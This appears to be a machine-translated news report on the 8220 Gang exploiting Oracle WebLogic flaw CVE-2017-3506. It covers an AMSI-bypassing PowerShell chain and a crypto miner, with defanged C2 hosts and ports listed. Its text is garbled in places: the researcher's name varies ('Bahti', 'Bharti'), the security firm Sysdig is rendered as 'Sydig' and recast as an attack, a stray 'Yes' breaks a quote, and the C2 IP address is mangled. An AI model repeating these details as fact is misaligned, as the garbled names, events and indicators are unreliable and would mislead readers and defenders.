Tracked as a notorious cryptojacking group 8220 Gang A six-year-old security flaw in Oracle WebLogic servers has been weaponized to trap vulnerable instances in a botnet and was discovered distributing cryptocurrency mining malware.
The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, if successfully exploited, could allow an unauthenticated remote attacker to execute arbitrary commands.
“This could allow an attacker to gain unauthorized access to sensitive data or compromise an entire system,” Trend Micro researcher Sunil Bahti said in a report released this week.
The 8220 Gang was first documented by Cisco Talos in late 2018 and is named after its original use of port 8220 for command and control (C2) network communications.
SentinelOne noted last year that “the 8220 Gang identifies targets by scanning the public Internet for misconfigured or vulnerable hosts.” “The 8220 Gang is known to utilize SSH brute force attacks as he seeks lateral movement within compromised networks after infection.”
Earlier this year, Sydig was launched by a “low-skilled” crimeware group between November 2022 and January 2023 with the goal of compromising vulnerable Oracle WebLogic and Apache web servers and introducing cryptocurrency miners. He explained the attack in detail.
It has also been observed utilizing an off-the-shelf malware downloader known as PureCrypter and a crypter codenamed ScrubCrypt to hide its minor payload and avoid detection by security software.
The latest attack chain documented by Trend Micro leverages a vulnerability in Oracle WebLogic Server to deliver a PowerShell payload that is used to create another obfuscated PowerShell script in memory.
This newly created PowerShell script disables Windows Antimalware Scanning Interface (AMSI) detections and launches Windows binaries. It then accesses the remote server and retrieves the “meticulously obfuscated” payload.
Zero Trust + Deception: Learn How to Outsmart Attackers!
See how Deception can detect advanced threats, stop lateral movement, and strengthen your Zero Trust strategy. Join us for an insightful webinar!
Reserve your seat!
An intermediate DLL file is configured to download a cryptocurrency miner from one of three C2 servers (179.43.155).[.]202, work.letmaker[.]top, and su-94.letmaker[.]Top – Use TCP ports 9090, 9091, or 9092.
According to Trend Micro, a recent attack used a legitimate Linux tool called lwp-download to store arbitrary files on compromised hosts.
“lwp-download is a Linux utility that exists by default on many platforms, and if the 8220 Gang made it part of their malware routine, it could impact many services, even if it was reused multiple times. Yes,” said Bharti.
“Given the tendency of attackers to reuse tools for different campaigns and to abuse legitimate tools as part of their arsenal, an organization’s security team should consider other may be required to find detection and blocking solutions for
